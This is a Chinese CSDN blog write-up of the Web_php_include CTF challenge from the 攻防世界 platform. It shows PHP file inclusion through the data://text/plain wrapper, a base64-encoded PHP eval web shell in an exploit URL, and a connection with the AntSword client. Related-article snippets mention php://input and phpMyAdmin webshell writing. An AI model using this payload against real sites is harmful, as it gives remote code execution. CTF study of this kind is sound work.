攻防世界-Web_php_include

最新推荐文章于 2024-05-11 22:27:02 发布
最新推荐文章于 2024-05-11 22:27:02 发布
阅读量100 收藏
点赞数 1
分类专栏: 攻防世界web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/li2254477890/article/details/119189093
版权
本文探讨了一种通过data://text/plain协议进行文件包含漏洞的利用方式,详细描述了如何将PHP代码转化为base64编码,并在URL中进行传递,以连接并控制目标网站。同时,提到了使用蚁剑工具进行实际操作的步骤。
摘要由CSDN通过智能技术生成

在这里插入图片描述这个考察的是文件包含。
通过data://text/plain协议来进行漏洞利用

在这里插入图片描述
这个我直接用了蚁剑进行了连接,
在这里插入图片描述
在这里插入图片描述
将<?php @eval($_POST['pass']) ?>转化为base64、PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo=
然后我门http://111.200.241.244:63659/?page=data://text/plain/;base64,PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo=
我们用蚁剑连接这个网站。

Nothing-one
关注
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3706
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3398
攻防世界 -- fileinclude
攻防世界WEB练习-fileinclude
不知名白帽的博客
08-31 6793
攻防世界WEB练习-fileinclude
file_include(攻防世界)
m0_56107268的博客
11-14 7894
php转化器的学习
攻防世界-fileinclude
weixin_39579781的博客
04-13 706
题目说flag在flag.php中,通过ctrl+uc查看源码,考虑文件上传漏洞。源码如下图所示:大意是取cookies中lan的值,如果不是0,则执行cookies中名为english的php
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. ...
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 506
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 507
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界 fileinclude
qq_73861475的博客
05-20 540
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开题目进入环境,在此之前题目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
攻防世界(fileinclude
……
09-13 7737
攻防世界文件包含题目
攻防世界---fileinclude
m0_72447684的博客
10-11 1269
攻防世界---fileinclude
攻防世界—file_include
小缪的博客
06-10 3009
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界】file_include
m0_74979597的博客
09-13 1850
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界-web-fileinclude
最新发布
MateSnake的博客
05-11 396
攻防世界-web-fileinclude
攻防世界17.fileinclude
weixin_49765221的博客
04-19 875
php的伪协议需要多理解呀
攻防世界(CTF)~web-fileinclude
m0_75030189的博客
04-21 601
本题主要涉及到php伪协议和代码审计,如果文章有错误希望及时和小白我联系进行更改! 加油,又是刷题的一天!
Web安全攻防世界01 fileinclude(宜兴网信办)
weixin_42789937的博客
11-26 4708
Web安全攻防世界01 fileinclude,文件包含类型题目,参考大佬们的WP有所补充,内容对小白友好~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值